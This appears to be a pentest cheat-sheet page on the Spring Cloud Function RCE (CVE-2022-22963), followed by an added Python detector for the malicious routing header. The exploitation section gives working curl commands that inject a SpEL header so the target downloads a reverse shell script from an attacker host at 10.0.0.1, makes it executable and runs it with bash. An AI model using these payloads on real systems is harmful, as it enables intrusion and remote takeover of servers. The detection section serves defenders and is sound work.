Spring Cloud Function RCE
Spring Cloud Function is vulnerable to RCE (CVE-2022-22963)
- [CVE-2022-22963](https://github.com/me2nuk/CVE-2022-22963)
Exploitation
Reverse Shell
First, create a reverse shell script on the local machine.
Then start a web server on the local machine to host it, so the target can download it.
Now trigger remote code execution on the target website as below.
```sh
curl -X POST https://example.com:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("wget http://10.0.0.1/shell -O /tmp/shell")' --data-raw 'data' -v
```
Our reverse shell script is now uploaded to the target.
Start a listener on the local machine.
Trigger remote code execution again to run the reverse shell.
```sh
# As needed
curl -X POST https://example.com:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/shell")' --data-raw 'data' -v
curl -X POST https://example.com:8080/functionRouter -H 'spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("bash /tmp/shell")' --data-raw 'data' -v
```
We should get a shell.
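From the defender's side, every request above carries the `spring.cloud.function.routing-expression` header, which the application evaluates as a Spring Expression Language (SpEL) expression. The following added example (not part of the original page; the function names and sample requests are constructed for illustration) flags that header in captured raw HTTP requests, matching the header name case-insensitively and rating `T(...)` type references or constructor calls as high severity.

```python
import re

HEADER = "spring.cloud.function.routing-expression"
# SpEL constructs that reach arbitrary classes: T(type) references and constructor calls.
SPEL_TYPE_REF = re.compile(r"\bT\s*\(|\bnew\s+[\w.]+\s*\(")


def inspect_request(raw):
    """Return a finding dict for one raw HTTP request, or None if the header is absent."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]  # request line + headers only
    lines = head.split("\n")
    method, path = (lines[0].split() + ["", ""])[:2]
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        # HTTP header names are case-insensitive, so normalise before comparing.
        if sep and name.strip().lower() == HEADER:
            value = value.strip()
            severity = "high" if SPEL_TYPE_REF.search(value) else "review"
            return {"method": method, "path": path,
                    "severity": severity, "expression": value}
    return None


def scan(requests):
    """Inspect every request and keep only those that carry the routing header."""
    return [f for f in map(inspect_request, requests) if f is not None]


# Constructed sample requests (not real traffic): the first reuses a header value
# shown on this page, the second is a plain header lookup, the third has no header.
SAMPLES = [
    "POST /functionRouter HTTP/1.1\r\nHost: example.com:8080\r\n"
    "spring.cloud.function.routing-expression:"
    'T(java.lang.Runtime).getRuntime().exec("chmod +x /tmp/shell")\r\n\r\ndata',
    "POST /functionRouter HTTP/1.1\r\nHost: example.com:8080\r\n"
    "Spring.Cloud.Function.Routing-Expression: headers['x-fn']\r\n\r\ndata",
    "POST /functionRouter HTTP/1.1\r\nHost: example.com:8080\r\n"
    "Content-Type: text/plain\r\n\r\ndata",
]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding)
```

A `review` finding still deserves a look: a client-supplied routing expression is unusual unless the application is known to rely on it.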